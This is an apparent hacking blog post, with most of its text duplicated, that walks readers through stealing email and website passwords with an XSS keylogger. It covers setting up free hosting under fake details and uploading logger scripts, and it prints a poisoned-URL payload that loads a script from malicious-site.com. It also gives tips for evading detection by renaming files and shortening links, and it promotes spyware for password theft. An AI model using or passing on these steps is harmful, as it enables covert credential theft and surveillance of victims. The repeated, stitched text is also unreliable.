Hello friends, today in this article I am going to share something new
trick to hack email account password and I don't think many people are
aware of this trick.
Anyway, this tutorial will show you how to turn a vulnerable website into a keylogger that will log all keypresses once the slave has clicked on our poisoned link and types on the webpage.
You need to have a website that is vulnerable to XSS injection. For more information about XSS Tutorial for Website Hacking.
Don’t forget to Subscribe to our RSS feed
Step 1: First thing we need to do is to create some web hosting. We need a host to host our keylogging script on it and this is what will be included in the poisoned url that we will send to people.
here I am using hosting.eu.pn because they don't seem to suspend accounts but you can use any host like 00webhost etc.
Ok so if you don't have an account already click "SIGN UP" otherwise click login at the top.
Step 2: Next select free hosting and click continue.
Step 3: Select sign up.
A new form will appear, now just fill in some fake info but you need a real email address to active the account. Check the "I agree to the terms" box and click continue.
Now that should be done, you just need to wait for an activation email to login then your account will be active.
Step 4: Once you have logged in click "website manager" at the top of the page.
Now click "File manager".
There will be two different type: lite and advanced but we can just use the lite file manager.
Step 5: Now you will see all the files of your web site, I have done mine in a different folder to make things look neat but you can just do it in the home directory.
At the bottom you should see the name of your site, click on that.
Now we need to upload our files, so click on "browse" and select our two files logger.php and logger.js
Download logger.php and logger.js files
Next we click on "Upload File(s)".
We also need a file for the keylogs to be written to, for this we will call it data.txt
Scroll down and in the create new file name box put "data.txt" and the click "Create File".
Remember all the files must be in the same folder!
Step 6:
Now we need to click on the edit button to the left hand side of the
file next to save and delete. You can do this before you upload it in
notepad or something.
Open the logger.js file and we need to edit the url to be the url to the php logger script.
The javascript is the file we will include in the poisoned url this will run and catch each keypress, it will then send them to the php script on our host that will right to the data.txt file. You can see how useful XSS can be.
Now we just need to set the permissions so all the files can work correctly.
Select all the files and set the permissions to 777 and click "set".
Step 7: Now the setup is complete, all we have to do now is create our poisoned url using our vulnerable site, like this example below.
As you can see our website has been inserted into the link of the vulnerable site. Now if someone clicks on that link everything they type in on that page will go to the data.txt file.
Here's an example below.
As you can see the url bar has our malicious link in it, at the bottom of the page Firefox shows us what sites we are connecting with. It says we are accepting scripts from eu.pn which is where our keylogger is hosted.
Notice at the top right hand corner of the page there is a search bar, I type in there "hi there!", now we check our data.txt on our site...
And there you have it, it works!
Note : There's a few things you need to bare in mind when using this.
Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,
So friends, I hope you will like this article and hopefully you will have learnt something from this and will have a better understanding of how cross site scripting works. If you need any help then post a comment and I will help you out.
HaPPy hAcKiNg.............
source : http://www.wildhacker.com
Anyway, this tutorial will show you how to turn a vulnerable website into a keylogger that will log all keypresses once the slave has clicked on our poisoned link and types on the webpage.
You need to have a website that is vulnerable to XSS injection. For more information about XSS Tutorial for Website Hacking.
Facebook Hacking : Hack Email Account Password Using XSS Keylogger
Follow the following steps to setup XSS KeyloggerStep 1: First thing we need to do is to create some web hosting. We need a host to host our keylogging script on it and this is what will be included in the poisoned url that we will send to people.
here I am using hosting.eu.pn because they don't seem to suspend accounts but you can use any host like 00webhost etc.
Ok so if you don't have an account already click "SIGN UP" otherwise click login at the top.
Step 2: Next select free hosting and click continue.
A new form will appear, now just fill in some fake info but you need a real email address to active the account. Check the "I agree to the terms" box and click continue.
Now that should be done, you just need to wait for an activation email to login then your account will be active.
Step 4: Once you have logged in click "website manager" at the top of the page.
Now click "File manager".
There will be two different type: lite and advanced but we can just use the lite file manager.
Step 5: Now you will see all the files of your web site, I have done mine in a different folder to make things look neat but you can just do it in the home directory.
At the bottom you should see the name of your site, click on that.
Now we need to upload our files, so click on "browse" and select our two files logger.php and logger.js
Download logger.php and logger.js files
Next we click on "Upload File(s)".
We also need a file for the keylogs to be written to, for this we will call it data.txt
Scroll down and in the create new file name box put "data.txt" and the click "Create File".
Remember all the files must be in the same folder!
Open the logger.js file and we need to edit the url to be the url to the php logger script.
The javascript is the file we will include in the poisoned url this will run and catch each keypress, it will then send them to the php script on our host that will right to the data.txt file. You can see how useful XSS can be.
Now we just need to set the permissions so all the files can work correctly.
Select all the files and set the permissions to 777 and click "set".
Step 7: Now the setup is complete, all we have to do now is create our poisoned url using our vulnerable site, like this example below.
Code:
http://target.com/search.php?keywords=<script src="http://malicious-site.com/keylogger.js"></script>
As you can see our website has been inserted into the link of the vulnerable site. Now if someone clicks on that link everything they type in on that page will go to the data.txt file.
Here's an example below.
As you can see the url bar has our malicious link in it, at the bottom of the page Firefox shows us what sites we are connecting with. It says we are accepting scripts from eu.pn which is where our keylogger is hosted.
Notice at the top right hand corner of the page there is a search bar, I type in there "hi there!", now we check our data.txt on our site...
And there you have it, it works!
Note : There's a few things you need to bare in mind when using this.
- The website has to be vulnerable to XSS injection for it to work.
- The timer in the javascript logger is set to 1 second but you can set this to anything you want. The keylogger actually records capital letters and other special character keys.
- Also this is meant for targeted attacks not for mass spreading as all the logs would get to jumbled up.
- A problem is that if someone leaves the page then you won't be able to receive logs any more.
- Also remember that the person can see the url so try renaming files to like "search.js" etc. or using goo.gl to shorten urls to prevent being detected.
Update : If you want to hack Gmail, Myspace and other email account passwords, please use the best Hacking Softwares,
- Facebook, Hotmail, Gmail Passowrd hacking through Winspy Keylogger
- Remote Password Hacking Software - Sniperspy keylogger
- How To Hack Password Through Mobile
So friends, I hope you will like this article and hopefully you will have learnt something from this and will have a better understanding of how cross site scripting works. If you need any help then post a comment and I will help you out.
HaPPy hAcKiNg.............
source : http://www.wildhacker.com
No comments:
Post a Comment